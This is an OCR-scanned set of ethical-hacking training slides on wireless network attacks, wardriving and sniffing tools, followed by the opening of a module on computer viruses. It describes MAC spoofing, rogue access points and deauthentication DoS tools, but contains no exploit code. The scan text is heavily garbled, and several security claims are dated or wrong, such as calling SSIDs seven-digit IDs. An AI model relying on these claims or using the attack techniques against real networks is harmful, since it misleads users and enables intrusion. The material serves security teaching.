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WhatisWPA? 



I 



© WPA is not an official I EEE standard, but will 
be compati bl e with the upcomi ng 802. Hi 
security standard 

© WPA (Wi-Fi Protected Access) is a data 
encryption method for 802.ILWLANs 

©WPA resolves the issue of weak WEP headers, 
which arecalled initialization vectors (IV) 

© WPA is designed to be a software upgrade 

© With WPA, the rekeying of global encryption 
keys is required 
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Related Technology and Carrier 
Networks 



©CDPD: Cellular Digital 
Packet Data (TDM A) 

© ]xRTT on CDMA (Code 
Division Multiple Access): 
Mobile phone carrier 
networks 

© GPRS: General Packet 
Radio Service on GSM 
(Global System for Mobile 
Communications) 

© FRS (Family Radio 
Service) and GMRS 
(General Mobile Radio 
Ser vi ce) : Radio ser vi ces 



© HPNA (Home Phone 
Networking Alliance) and 
Powerline Ethernet: Non- 
traditional networking 
protocols 

© 802. ]x: Port security for 
network communications 

© BSS ( Basi c Servi ce Set) : 
Access poi nt - bridges 
wired and wireless network 

© I BSS (I ndependent Basic 
Servi ce Set) : peer- to- peer 
or ad- hoc operation mode 
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MAC Sniffing and AP Spoofing 



© M AC addresses are easi ly sniffed by attackers si nee they 
must appear in the clear even when WEP is enabled. 

© An attacker can use those advantages in order to 
masquerade as a valid MAC address by programming 
the wireless card, and getting into the wireless network 
and usi ng the wi rel ess pi pes. 

© Spoof i ng M AC addresses i s very easy. U si ng packet- 
capturi ng software, an attacker can deter mi ne a val id 
MAC address usi ng one packet. 

© To perform a spoofing attack, an attacker must set up 
an access point (rogue) near the target wireless network 
or i n a pi ace where a vi cti m may bel i eve that wi rel ess 
Internet is aval I able. 



BC-Councll 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Tool to Detect MAC 
Wdlenreiter V2 



© Wei lenreiter is a wi reless network discovery and 
auditing tool 

© It is the easiest Linux scanning tool to use 

© 1 1 can discover networks (BSS/ 1 BSS) and detect 
ESSI D broadcasting or non- broadcasting networks 
and their WE P capabilities and the manufacturer 
automatically 

© 1 1 also identifies traffic that is usi ng a spoofed 
MAC address without relying on the MAC OUI 
information 

© DHCP and ARP traffic is decoded and displayed 
to give further information about the networks 

© An ethereal/tcpdump-compatibledumpfileand 
an application savefile are automatically created 

© Using a supported GPS device and thegpsd 
location of the discovered networks can be tracked 
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Wellenreiterll 



File Sniffer 



V 



® 



El Log 



i 



[23 
[23 
[23 
[23 
[23 
[23 
[23 
[23 
[23 
[23 
[23 
[23 
[23 



20 
20 
20 
20 
20 
21 
21 
21 
21 
21 
21 
21 
22 



11] 
11] 
23] 
25] 
25] 
17] 
19] 
25] 
26] 
28] 
43] 
56] 
42] 



) Weilenreiter has been started. 

) Running on Unknown'. 

) Started Scanning. 

)New network: ESSID Vanille-" 

)New Access Point in Vanille' [6] 

)New Wireless Station in ■Vanille'' [kk] 

WARNING: Unhandled IBSS traffic! 

WARNING: Unhandled IBSS traffic! 

WARNING: Unhandled IBSS traffic! 

WARNING: Unhandled IBSS traffic! 

WARNING: Unhandled IBSS traffic! 

(i)New Station in Vanille ■" [kk] 

(!) Stopped Scanning. 









1^ 








■^Q 23:23 
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Terminology 



© WarWalking- Walking around to look for open 
wi rel ess networks 

© Wardriving- Driving around to look for open wireless 
networks 

© War Flying- Flying around to look for open wireless 
networks 

© WarChalking- Using chalk to identify aval I able open 
networks 

© Bluejacking- Temporarily hijacking another person's 
cell phone using Bluetooth technology 

© Global Positioning System (GPS) - Can also be used to 
hel p map the open networks that are found 
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© Wi rel ess LAN s are suscepti bl e 
to the same protocol -based 
attacks that pi ague wi red LAN s 

© WLANssend information via 
radio waves on public 
f requenci es, maki ng them 
suscepti bl e to i nadvertent or 
del i berate i nterference from 
traff i c usi ng the same radi o band 

© Types of DoS attacks: 

• Physical Layer 

• Data-Link Layer 

• Network Layer 
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Dos Attack Tool : Fatajack 



© Fatajack is a modified WLAN J ack that sends a 
deautli instead of an autli. 

© This tool highlights poor AP security and works 
by sendi ng authentication requests to an AP 
with an inappropriate authentication algorithm 
and status code. This causes most to drop the 
relevant associated session. 
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M an- i n-the- M i dd e Attack ( M I TM ) 



©Two types of MITM: 

• Eavesdropping 

- Happens when an 
attacker receives a data 
communication stream 

- Not using security 
mechanisms such as 

I psec, SSH , or SSL makes 
data vul nerable to an 
unauthorized user 

• Manipulation 

- An extended step of 
eavesdropping 

- Can be done by ARP 
poisoning 



Eavesdropping 
) ))))) 



IVIanipulating 
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Scanning Tools 



© Redfang 2.5 

© Kismet 

©THC-WarDrive 

© PrismStumbler 

© MacStumbler 

© Mognet 

© WaveStumbler 
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© StumbVerter 
© AP Scanner 
© SSI D Sniff 
© Wavemon 

© Wireless Security Auditor 
© Ai rTraf 
© Wifi Finder 
© AirMagnet 
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Scanning Tool: redfang 



© Written by OllieWhitehouse 

© Searches for non-discoverable Bluetooth- 
enabled devices by brute- ford ng the last six 
bytes of the device's Bluetooth address and 
doi ng a read_ rennote_ name{ ) 



B3-Council 



Copyright © byC-Council 
All Rights reserved. Reproduction isstrictiy proiiibited 



0 Completely passive, capable 
of detect! ng f raff 1 c from APs 
and wi rel ess cl 1 ents al 1 ke 
(including NetStumbler clients) 
as well as closed networks. 

© Requires 802.11b capable of 
entering RF monitoring mode. 
Once in RF monitoring mode, 
the card is no longer able to 
associ ate with a wi rel ess 
network. 

© Kismet needs to run as root, 
but can switch to lesser 
privileged DID as it begins 
capture. 

© To hop across channels run 
kismet_ hopper - p. 

© Closed network with no 
cl i ents authenti cated i s shown 
by <nossid>, updated when 
crient logs on. 

K-Council www.kismetwireless.net 



mmmmm 



l|-Netuork List— (Autofit)- 



Name 


T 


U 


Ch Packts 


■lags 


Data Clnt 


p@thflnd3r 


A 


Y 


06 


171 


70 


35 


(no ssid) 


A 


N 


05 


1 




0 


0 


KrullNetl 


A 


Y 


06 


27 




0 


0 


linksys 


A 


N 


06 


81 


FU4 


8 


2 


marley 


A 


N 


06 


312 




17 


1 


(no ssid) 


D 


N 




20 


A2 


20 


18 


PARMAS 


A 


N 


07 


30 




0 


0 


(no ssid) 


A 


Y 


06 


1 




0 


0 


GRXiiJirelessNetwork 


A 


Y 


06 


2 




0 


0 


SECMAS 


A 


N 


07 


13 




0 


0 


(no ssid) 


D 


N 




1 


A4 


1 


56 


(Lucent Outdoor Router) 


0 


N 




267 




267 


1 



-Status- 
Found 
Found 
Found 
Found 



:00 


04:76 


BB 


A7:04 


via 


ARP 


:00 


04:76 


BB 


A7:04 


via 


ARP 


:00 


04:76 


BB 


A7:04 


via 


ARP 



IF 159.139.90.1 for (no ssid): 

IP 159.139.90.1 for (no ssid): 

IP 159.139.90.1 for (no ssid): 

IP 159.139.120.13 for (no ssid): :00:B0:D0:DE:60:E3 via TCP 



^atten^^AC^cha^^ 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Scanning Tool: THC-WarDriveV2.1 



© A Linux- based tool 

© THC-WarDriveisatool for mapping the city for 
wavelan networl<s with a GPS device whi le 
dri vi ng a car or wal ki ng through the streets 

© It is effective and flexible, a "must-download" 
for all wavelan nerds 

© Supports N M EA GPS devices 

© Free to download at 
http://www.thc.org/releases.php 
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Scanning Tool: prismstumbler 



0 Prisnnstunnbler is a wireless LAN (WLAN) 
that scans for beaconf rannes f ronn access 
poi nts. 

© Prisnnstunnbler operates by constantly 
switching channels and monitors any frames 
received on the currently selected channel. 

© The program was created by using ideas and 
codesnippetsfrom prismdump, AirSnort, and 
Ethereal. 

© Prismstumbler will also find private 
networks. Si nee the method used in 
prismstumbler is receive only, it can also find 
networks with weaker signals and discover 
more networks. 



* Prismstumbler 0.7.0 



File 



Controls: 



Help 



iBroins 



IC 



N 



H Scanner active 
□ Dump active 

Try Connect 

Track 



^[ □ Jump to active 



Preferences 



ic/ BSSID 




00:00:00:00:00 

S0:CS:AC:3E:32 
A0:C5:49:FB:GC 



http://prismstumbler.sourceforge.net/ copyright© by bc council 
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Scanning Tool: MacStumbler 



© MacStunnbler is a utility 
used to display infornnati on 
about nearby 802.11b and 
80 2 . Ilg wi rel ess access 
poi nts. 

© It is mainly designed to be 
a tool to hel p f i nd access 
poi nts whi I e travel i ng, or to 
di agnose wi rel ess network 
problems. 

© MacStumbler requires an 
Apple Airport Card and 
MacOS 10.1 or greater. 
MacStumbler doesn't 
currently support any kind of 
PCMCIA or USB wireless 
device. 



§09 MacStumbler OJb O 

^ IE S ^v%%%%%%%* [Oej 1 

Save Open Clear Status Prefs Details 
'SSID jChan 'Signal Noise WEP 'Vendor 




Details: private 

MAC: 00:05:25 :DF:9A:19 
Vendor: Linksys 


1 private 11 2 i 7 Yes Linksys 




Type: Manacjed 

Location: CPS Enabled 
Lat: W]]37.a26904 
Lon: N11739.6E5547 

f"'rMT^i>-iQ ntr ■ 


Log: 

SSID Ichan MaxSlg WEP lUstSeer i Vendor 


j 




My home network ;)| 




private 11 29 Yei 03:17PM O?/02/O3 Linksys 




j default 6 27 No 03:17PM 07/02/03 D-Link 
1 

1 


y 


1 







http:/ / www. macstu m bl er .com/ 
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Scanning Tool: mognetVI16 



© Mognet isasinnple, lightweight 
802.11b sniffer written in J ava and 
aval I abl e under the GPL. 

© It features real -time capture output, 
support for all 802.11b generic and 
frame- specific headers, easy display of 
frame contents i n hex or ASCI I , text 
mode capture for GU I - 1 ess devi ces, 
and loading/ saving capture sessions in 
I ibpcap format. 

© Mognet requires a J ava 
Development Kit 13 or higher, and a 
workingC compiler for native code 
compilation. 



m 



Mognet 



File Capture Mode 



Type 


Source 


Dest 


SSID 




Beacon frame 


00 04 5adO eb db 


ffffffffffff 




A. 


Beacon frame 


00 04 5aOe Jp |J 


ffffffffffff 


linksys 




Beacon frame 


00 04 5ad0 eb db 


ffffffffffff 


ml 




Beacon frame 


00 04 5ad0 eb db 


ffffffffffff 






Beacon frame 


00 04 SaOeHh N 


ffffffffffff 


linksys 




Beacon frame 


00 04 5adO eb db 


ffffffffffff 




T 



Detail 



Hex Dump ASCII Dump 



Source address: 00 04 5a Oe J! "J 
Destination address: ffffffffffff 
BSS Id: 00 04 5aOe ii Ji 
Fragment number: 6 
Sequence number: 2822 



Frame number: 66, Frame size: 60 bytes 



http://www.node99.org/ projects/ mognet/ 
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Scanning Tool: WaveStumbler 



© WaveStumbler is a console- based 802.11 
network mapper for Linux 

© It reports the basic AP information likechannel, 
WEP, ESSID,andMAC 

© 1 1 consists of a patch agai nst the kernel driver, 
orinoco.c, whicn makes it possible to send the 
scan command to the driver via the 
/ proc/ hermes/ ethX/ cmds f i I e 

© The answer is then sent back viaa netlink 
socket 

© WaveStumbler listens to this socket and 
displays the output data on the console 

ki _ ..... 

http:// www.cqure.net/tools.jsp?id=08 copyright © byBc council 
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Scanning Tool: StumbVerter V15 



© StumbVerter is a standalone 
application that allows Network 
Stumbler's summary files to be 
i mported i nto M i crosoft's 
M appoint 2004 maps. 

© The I ogged WAPs wi 1 1 be shown 
with small icons, their color and 
shape relating to WE P mode and 
signal strength. 

© As the AP icons are created as 
M apPoi nt pushpi ns, the bal I oons 
contain other information, such 
as MAC address, signal strength, 
and mode. 





f SfJCHl 



BC-Council http://www.sonar-security.com/ 
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Scanning Tool: NetchaserVIO for 
Palm Tops 



NetChaser 



7 APs Found 



© System Requirements 

• Pal m Tungsten C H and held Computer 

• Main Screen 

- Tap on access poi nt to connect 

- Signal strength display 

- Access point SSI D 

- WE P status 

- Loss-of-signal dime display 

- Current battery voltage and ti me 

• Access Point I nfo 

AP |V| AC address 

- APSSID 

- Signal strength 

- Channel 

- Loss-of-signal time and date display 

- Latitude and longitude of strongest signal 

• Full Logging Support 

- Log al I access poi nt data to a f i I e for post- processi ng 

- CSV standard file suitable for import into any database 
or spreadsheet 



(T) SSID: "simply" 

MAC: 00:50:F2:79: 1 6:5C 
Signal: -78dBm 
Channel: 6 
Lasl Seen: 5:51 pm 
Lat: 4137.7597 N 
Lon: 09342.1735 W 
WEP is enabled. 



21 APs Found 





SSID 


Time 




sheppardjab 


6:06 pm ^ 




law-school 


6:05 pm | 


T____ 


default 


6:05 pm | 




Cowles_Wireless 


6:06 pm | 




linksys 


6:09 pm | 




linksys 


6:10 pm 1 


To 1^ 


SAVAGE 


6:11 pm 1 




<NO NAME> 


6:12 pm 1 


Yq cS) 


WarDrive 


6:13 pm | 


Scanning 


6:13 pm 





[ Stop Scan"^ |g.ps VAUOl ( Clear List^ 



BC-Gounci I http:/ / www. bi tsn bolts.com/ netchaser . htm I 
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Scanning Tool: AP Scanner 



© AP Scanner is an application that shows a graph 
of the channel usage of al I open wi reless access 
points within range 



http://www.versiontracker.com/ cop^igh.ebyB:<x^ncii 
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Scanning Tool: Wavemon 



© Wavemon is a ncurses- based 
monitor for wi re! ess devices 

© Wavemon a! I ows watclii ng of 
signal and noise levels, 
packet statistics, device 
configuration, and network 
parameters of hardware or 
wi rel ess network 

© It has currently only been 
tested with the Lucent 
Or noco series of cards, 
although it should work 
(with varying features) with 
al I devi ces supported by the 
wireless kernel extensions 
written by J ean Tourrilhes 






[-] sig Ivl (-102.4 


) dBm) [ ] ns 1 


jl (dB») 


[|] S-N ratio (dB) 






' £ 1 


H 


S <i ID } 


m 1 



http://freshmeat.net/projects/wavemon/ Copyright © byBC-Council 
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Scanning Tool: Wireless Security 
Auditor (WSA) 



© An I BM research prototype 
of an 802.11 

© A Wireless LAN security 
auditor, running on Linux or 
aniPAQPDA 

© WSA helps network 
administrators by auditing the 
wi reless network for security 

© Vulnerabilities in the 
network can be discovered 
before hackers break i n the 
network 



Uir^e33SeartkjAiHr<:ilflI] X 



File Options Help 



bounce address 



ssid: 



00:40:96:27:ff:4b ??? 



b:40:96:24:S3;5e tsunami 



00:40:9G:27:ec:74 IBM 



25^ 



54^ 



40^ 



http:/ / www. research . i bm .com/ gsal/ wsa/ 
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Scanning Tool: AirTraf 10 



© AirTraf LO is a wireless sniffer that can detect and 
determine exactly what is being transmitted over 802.11 
wi rel ess networks. 

© 1 1 is developed as an open source program. 

© 1 1 tracks and identifies legiti mate and rogue access 
points, keeps performance statistics on a by- user and by- 
protocol basis, measures the signal strength of network 
components, and more. 



BC-Council 
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Scanning Tool: Wifi Fi 



© Checks for 802.11b and 802. Ilg 
signals without a computer or 
PDA 

© The user i nterface consists of a 
single button and three LEDs 
that indicate aval I able signal 
strength 



http://www.kensington.com/ 
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Sniffing Tools 



© AiroPeek 

© NAI Wireless Sniffer 

© Ethereal 

© VPN monitor I 

© Aerosol vO.65 

© vxSniffer 

© EtherPEG 

© DriftNet 

© WinDump 

© ssidsniff 
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Sniffing Tool: AiroPeel< 



© A wi reless management tool needed to deploy, 
secure, and troubleshoot the wireless LAN 

© Covers the whole wireless LAN management, 
i ncl udi ng site surveys, security assessments, 
client troubleshooting, WLAN monitoring, 
remote WLAN analysis, and application layer 
protocol analysis 

© H as an enhanced analysis of Vol P 

http://www.wildpackets.com/products/airopeek_nx 
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Sniffing Tool: NAI Wire! ess Sniffer 



© Developed by Network Associates, I nc. 

© Used for rogue mobile unit detection. It gathers 
a I i St of all the wi rel ess devi ces, whether they're 
access units or mobile devi ces, and labelsthem 
as such. 
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MAC Sniffing 



I 



© Ethereal is a free network 
protocol analyzer for Unix 
and Windows 

© 1 1 al I ows exanni nati on of 
data from a I i ve network or 
from a captu re f i I e on d i sk 

© Ethereal has several 
powerful features, including 
a rich display filter 
language and the ability to 
view the reconstructed 
stream of a TCP session 



BC-Councll 



ol: Etiiereal 



I 



ff:ff:ff:ff:ff:ff 

iiiiiiiiiiiiiiiii 


ARP 

1 II 1 1 


Who has 192 

1 1 1 1 II I V ^ 


bam.zinci.orq 


ARP 

1 II 1 1 


192.1G3.0.1 


192.1G3.0.1 


DNS 


Standard qu 


batti.zinci.orci 


DNS 


Standard qu 


slashdot.org 


TCP 


2741 > mi ' 


bani.zing.org 


TCP 


mi > 2741 


slashdot.org 


TCP 


2741 > mi 


slashdot.org 


WW 


GET / WW/ 


bani.zing.org 


TCP 


mi > 2741 






WWhA 20 
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Sniffing Tool: Aerosol V0.65 



© Aerosol i s easy 
to use wardriving 
software for 
PRISM 2 Chipset, 
ATM EL USB, and 
WaveLAN 

© It's lightweight 
written in C, and 
free 



^ Aerosol 



Card Statistics Settings 



Channel hO 



Signal Strength 



r- Last BSS Detected (Blue = WEP)- 



Date/Time 



SSID 



23/1/03 18:13:40 test 




Card Status |Connected to ESS 



Vendor 



D-Link 



Mac Addr 



Chn I Sig 



00:05:5d:ee:4c:1c 10 8 



GK 



Cancel 



http://www.stolenshoes.net/sniph/aerosol-0.65-readme.html 
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Sniffing Tool: vxSniffer 



© vxSniffer is a complete networl< monitoring tool 
for Windows CE- based devices 

© It operates on all Handheld 2000 HPCs, Pocket 
PCs, Pocket PC 2002s, and Windows Mobile 
2003s 

© It requires an ether net adapter with an NDIS 
compatible driver 

© vxSniffer is licensed software 



council http://www.cam.com/vxSniffer.html 
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Sniffing Tool: Etherpeg 



© Watches the local 
network for traffic, 
reassembles out-of-order 
TCP streams, and scans the 
result for data that looks 
likeaGIForJ PEG 

© A si mpl e but eff ecti ve 

hack that indiscriminately 
shows al I i mage data that it 
can assemble 

© The source code is freely 
aval I abl e and compi I es 
easi I y wi th a si mpl e make 
from the termi nal wi ndow 



i iitufws nit g 



^ W -t^t O'Mw Sun nt f 
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Sniffing Tool: Drifnet 



© Based on the I i nes of EtherPEG 

© 1 1 i s a program whi ch I i stens to 
network traffic and picks out i mages 
from TCP streams it observes 

© I n the beta version, driftnet picks 
out jVlPEG audio streams from 
network traffic and tries to play them 
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© AirMagnet vl2 is a new tool from 
AirMagnet 

© It issimilar to MiniStumbler except it 
has a GPS option 

©This tool is used not only for sniffing 
out wi rel ess networks, but for the 
deployment and administration of 
WLANs in organizations 

© Ai rM agnet uses many levels of 
graphics and animations to display real- 
ti me stati sti cs of WLAN s i n the area 

© AirMagnet not only displays the 
unsecured networks, but also gives a list 
of possible security holes and 
configuration problems with WLANs in 
the area 
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fj^ AirMaflnat ^^^^ 4f 10:44 { 



mm Mi LcvgI 

■*r^ 




1 3 ^ 6 7 9 loiL 32 1314 

Scan CN I 2 



^ Ad-Hoc {!> 

13 Expert AUvic^e; 

0R Security (7,6.0) 





94 




3 






Total Frames 


725 


fiielR ©It * 1 = ^ 
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© WinDump is the porting to 
the Windows platform of 
tcpdump, the most used 
networl< sniffer/ analyzer for 
UNIX 

© WinDump isfully 
compatible with tcpdump and 
can be used to watch and 
di agnose network traff i c 
according to various complex 
rules 

© 1 1 can run under Wi ndows 
95/ 98/ ME/ NT/ 2000/ XP 
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<:-\ Command Prompt - windump -i 2 



CiSDociinents and SettincfsS(ldninistrator\Desktop>uindunp -D 
lADeuice\NPF_{6EflE8CBE-9F18-474E-S71C-765E90CS32Cfl} (Intel(fi) PRO Adapter (Micr 
osoft's Packet Scheduler) ) 

2ADeuice\NPF_{8BD246F0-8175-490F-B873-4S3D91402181} (3Con EtherLink PCI (Micros 
oft's Packet Scheduler) ) 



CiSDocunents and SettincfsS(ldninistrator\Desktop)uindunp -i 2 
uindunp: listening on NDeuice\NPF_{8BD246F0-8175-490F-B873-483D91402181} 
18:58:34.226540 IP 0.0.0.0.68 ) 255.255.255.255.67: xid:0x7e003f29 secs:15086 f 
lags: 0x8000 [Ibootp] 

18:58:50.226359 IP 0.0.0.0.68 ) 255.255.255.255.67: xid:0x7e003f29 secs:15086 f 
lags: 0x8000 [Ibootp] 

18:59:00.679236 IP IIL-LflB08.138 ) 169.254.255.255.138: udp 201 
18:59:07.539492 IP IIL-LflB08.137 > 169.254.255.255.137: udp 50 
18:59:08.288362 IP IIL-LflB08.137 ) 169.254.255.255.137: udp 50 
18:59:09.038351 IP IIL-LflB08.137 ) 169.254.255.255.137: udp 50 



Sniffing Tool: Ssidsniff 



© A useful tool for discovering access points and 
saving captured traffic 

© 1 1 comes with a configure scri pt and supports 
Cisco Aironet and random prism2 based cards 
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Multi Use Tool: THC-RUT 



I 



© It gathers information from local and remote 
networks 

© 1 1 offers a wide range of networl< discovery 
tools: arp lool<up on an I P range, spoofed DHCP 
request, RARP, BOOTP, I CM P-ping, I CMP 
address mask request, OS f i ngerpri nti ngs, and 
high-speed host discovery 

© THC-RUT comes with a new OS Fingerprint 
implementation 



http://www.thc.org/thc-rut/ 
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© Wi nPcap is a free publ ic system for di red network 
access under Wi ndows. 

© |V| ost networl<i ng appi i cati ons access the networl< 
through widely used system primitives, lil<esocl<ets. 
This approach allows easy transfer of data on a 
network, because the OS copes with low level details 
(protocol handling, flow reassembly, and so on) and 
provi des an i nterf ace si mi I ar to the one used to read 
and write on a file. 

© Wi nPcap can be used by different ki nd of tools for 
network analysis, troubleshooting, security, and 
monitoring. 



Tool: WinPcap 
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http://winpcap.mirror.ethereal.com/install/default.htm 
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© bsd-airtools is a package that provides a complete tool set for 
wi reless 802.11b auditing. 

© It contains a bsd-basedWEPCracking application, called 
dweputils, as well as kernel patches for NetBSD, OpenBSD, and 
FreeBSD. 

© It also contains a curses-based AP detection application similar to 
netstumbler (dstumbler) that can be used to detect wireless access 
Doints and connected nodes, view signal to noise graphs, and 
nteractively scroll through scanned APs and view statistics for 
each. 

© 1 1 al so i ncl udes other tool s to provi de a compi ete tool set for maki ng 
use of all 14 of theprism2 debug modes as wel I as do basic analysis 
of the hard ware- based link-layer protocols provided by prism2's 
monitor debug mode. 



http://www.dachbOden.com/ projects/ bsd-airtools. htm I 
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Wl DZ: Wireless I ntrusion Detection 
System 



© Wl DZ version 1 is a proof of concept I DS system for 802. 11 that 
guards APs and monitors local for potentially malevolent activity 

© It detects scans, association floods, and bogus/ rogue APs. It can 
easily be integrated with SNORT or RealSecure 



/ Targ^et3 
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© MAC Address Filtering 

This method uses a I i st of M AC addresses of cl i ent wi re! ess 
networl< i nterface cards that are allowed to associate with the 
access poi nt. 

© SSI D (Network! D) 

The f i rst attempt to secure a wi rel ess network was the use of 
Network I D (SSI D). When a wireless client wants to associate with 
an access point, the SSI D istransmitted during the process. The 
SSI D is a seven-digit alphanumeric I D that is hard coded into the 
access poi nt and the cl i ent devi ce. 

© Firewalls 

Usi ng a fi rewal I to secure a wi rel ess network is probably the only 
way to prevent unauthorized access. 

© Wi rel ess networks that use i nf rared beams to transport data from 
one poi nt to another are very secure. 
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Out of the box security 



laptop 



Laptop 
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Access Point 



Workstation. 




Workstation 



r 



File Server 




File 3<:i-v*::i- 



IVetworlt 
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Radius: Used as Additional Layer in 
Security 
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Maximum Security: Add VPN to 
Wireless LAN 




BC-Councif^ 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 




© A wi reless network enables a mobi le user to connect to a LAN through a 
wireless (radio) connection. 

© Wired Equivalent Privacy. (WEP), a security protocol, specified in thelEEE 
Wi-Fi standard, 802. lib, is designed to provide a wireless local area 
network (WLAN) with a level of security and privacy connparable to what 
is usually expected of a wired LAN. 

© WEP isvulnerablebecauseof relativelyshort IVsand keys that remain 
static. 

© Even if WEP isenabled, MAC addresses can be easily sniffed by an 
attacker as they appear i n the clear format. Spoof i ng M AC address is also 



© I f an attacker holds wi reless equi pment near a wi reless network, he could 
perform a spoof i ng attack by setti ng up an access poi nt ( rogue) near the 
target wireless network. 

© Wireless networks are extremely vulnerableto DoS attacks. 

© A vari ety of hacki ng and mon i tori ng tool s are aval I abl e for wi rel ess 
networks. 

© Wireless network security can include adopting a suitable strategy of MAC 
address filtering, firewalling, or a combination of protocol -basea 

measures. 



easy. 
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Ethical Hacking 



Module XVI 
Vi rus 



Scenario 



M i chael i s a system admi ni strator at one of 
the top onl i ne share tradi ng f i rms. Other than 
his basic job as a system administrator 
|V| i chael has to monitor shares of some firms 
traded at stocl< marl<ets i n the geographical 
region other than his country. So M i chael has 
a dual role in the organization. 



Michael works at night shift. One night 
something unusual happened. Michael was 
al armed to see the si ze of the company's 
mai I box. 
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Scenario 



The outbox was empty last ti me he had 
checked, but now it was flooded with 
mai Is which were sent i n bul k to the 
respective mail ids in the address book. 
The system had also become slow. 

This was not because of some i nternal 
error i n the mai I server somethi ng 
serious had happened. M ichael had to 
take the mai I server off the network for 
further investigations. 

What could have triggered such an 
event? 

J ust imagine the company's credibility 
if the bulk mails reached all of its 
clients mailbox. 



BC-Councll 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Module Objectives 



©Virus - characteristics, history 
and some terminologies 

©Difference between a vi rus and 
a worm 

©Virus history 

©Lifecycleof a virus 

©Types of vi rus and reasons why 
they are considered harmful 

© F amous Vi rus/ worms 

©Writi ng a si mpl e program 
which can disrupt a system 

©Effect of virus on business 

©Virus Hoaxes 



©H ow a vi rus spreads and i nfects 
the system 

©I ndi cations of a virus attack 
©Virus construction kits 
©Virus detection methods 
©Antivirus Tools 
©Antivirus Software 
©Dealing with virus infections 
©Sheep Dip 

©Few computer vi rus to be 
checked for 
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Module Flow 







Characteristics 




Virus Hoax — 






Virus and Worm 




Virus 




■^^^im^!5o^^^^ 



virus attacl< 



l<it 



Of vi rus 



Wild 




i rus Life cycle 



Virus Classification 



Virus detection 
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Response 



■► Countermeasures — i 



Virus in 2004 ^ 
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© Computer vi ruses are perceived as a threat to 
both business and personnel. 

© This module looks into the details of computer 
viruses; their functions; classifications and the 
manner in which it affects systems. 

© The module also high lights the various counter 
measures that one can take agai nst vi rus 
attacks. 
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Vi rus Character i sti cs 



I 




©A virus is a program that 
reproduces its own code by 
attach i ng itself to other executable 
f i I es such that the vi rus code i s run 
when the i nf ected executabi e f i I e i s 
executed. 

©Viruses and malicious code 
exploit the vulnerability in a 
program. 





Operates without the knowledge or desi re of the computer user J 
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Symptoms of Vi rus- L i ke Attack 



© I f the system acts i n an unprecedented manner, a vi rus 
attack can be suspected. Example: Processes take more 
resources and are ti me consumi ng. 

© H owever, not al I gl itches can be attri buted to vi rus 
attacks. 

• Examples include: 




• Certai n hardware problems. 

• I f computer beeps with no display 

• I f one out of two anti-vi rus programs report 
a vi rus on the system. 

• I f the label of the hard drive has changed , 
etc. . . 
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What i s a Vi rus H oax? 



vi rus hoax i s a bl uff i n the name of a vi rus 




©For example, foil owing the outbreal< of the 
W32.bugbear(g)mm worm, there was a hoax 
warning users to delete thej dbgmgr.exe file 
that has a bear icon. 

© Being largely misunderstood, viruses easily 
generate myths. M ost hoaxes, whi I e del i berately 
posted, die a quick death because of thei r 
outrageous content. p ^ ■ 



JDBGMGR.EXE 
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Terminologies 



11 



© Worms 

• A worm does not requi re a liost to rep! i cate. A^?^ 

• Worms are a subset of vi rus programs. 

© Logic Bomb 

• A code surreptitiously inserted into an application or 
operati ng system that causes it to perform some 
destructive or security-compromising activity whenever 
specified conditions are met is known as a Logic bomb. 

© Time Bomb 

• A ti me bomb is considered to be a sub form of logic bomb 
that is triggered by reachi ng some preset ti me, either once 
or periodically. 

© Trojan 

• A Trojan is a small program that runs hidden on an 
infected computer. 
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H ow i s a Worm D i fferent from a Vi rus? 



©There is a difference 
between general vi ruses 
and worms. 

© A worm is a special 
type of vi rus that can 
repi i cate itself and use 
memory, but cannot 
attach itself toother 
programs. 

©A worm spreads 
through the i nfected 
network automatically 
but a virus doesn't. 



iCNN ■cori - Computer worm grounds flights, blocks ATMs - Jan, 26, 2003 - Microsoft Internet Explorer provided by Compaq 



am. 



com„ 



i6i Click to Print | 



Gi^sPRINTTHIS 

Powsrsd by (jGckabili^ 

SAVE THIS I £WAIL THIS I Ctose 



Computer worm grounds flights, blocks ATMs 

Experts^ Little damage in worst Internet attack in 18 months 

W ASHINGTON (CNN) —A fast-mv^ing computer w orm soarled business and go^ erameat computers Saturday, sloRiag some corporate systems to the point of 
iaaccessibilit}'. Internet security' experts said the Tiorm does not appear to ba^ e done any serious damage. 

The worm, dubbed "SQL Slammer," attacked \ia a \Tiliierabilil:\' discovered six months ago in SQL Ser\-er 2000 sofhvare from \Iicrosofi: Corp., according to 
OKv'er Friedrichs, a senior manager with Internet security' firm S)Taantec Corp. \Iicro5.ofl: has offered afi"ee patch to fix the trouble spot, but not all us.ers of the 
server sofhA^are mstallied the patch. 

Experts called it the most damaging attack on the Litemet in IS months as networks across Asii Europe and tbe Americas were effecti\-ely shut down, Reuters 
reported. 

Bank of America Corp., one of the nation's largest banks, said many customers could not withdraw money fi'om its 13,000 ATMs because of technical problems 
caused by the attack, according to The Associated Press. A spokeswoman, Lisa Gagnon, told the AP that the bank restored sen,^ce to nearly all ATMs by late 
Saturday afternoon and that customers' money and personal information had not been at risk. 

Friedrichs said the SQL worm "breaks into the ser\^er and tries to spread." 

"If realty generates a lot of network traffic," Friedrichs said. "It's real!}' just going to slow do\™ Internet performance." 

The 'W/^e House was notiGed about the attack after it was discovered early Saturday^ said Tiffany Olson, a spokeswoman for the President's Critical Infrastructure 
Protection Board. 
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ndi cations of a Vi rus Attack 




The f ol I owi ng are some 
i ndi cati ons of a vi rus attacl<: 

- Programs take I onger to I oad 
than nornnal. 

- Computer's hard drive 
constantly runs out of free 
space. 

- Files have strange names 
which are not recognizable. 

- Programs act erratically. 

- Resources are used up easi ly. 
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Virus Hi stop 



Year of discovery 

1981 
1983 
1986 
1989 
1995 
1998 
1999 
2003 
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Virus Name 

Apple II Virus- First Virus in the wild 

First Documented Virus 

Brain, PC-Write Trojan, & Virdem 

AIDS Trojan 

Concept 

Strange Brew & Back Orifice 

Melissa, Corner, Tristate, & Bubbleboy 

Slammer, Sobig, Lovgate, Fizzer, 
Bl aster/ Wei chi a/ M i mai I 
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Virus Damage 



©Virus damage can be grouped broadly under: 




• Technical Attributes: The technicalities 
i nvol ved i n the model i ng and use of vi rus 
causes damage due to: 





Lack of control ^^^^^^^^l^^^^^^l 


^^^H 2. 


D i ff i cu 1 ty i n d i sti ngu i sh i ng the natu re of attack. 


^^^H 3. 


Draining of resources. ^ 


^^^^1 4. 


P resence of bugs. H 


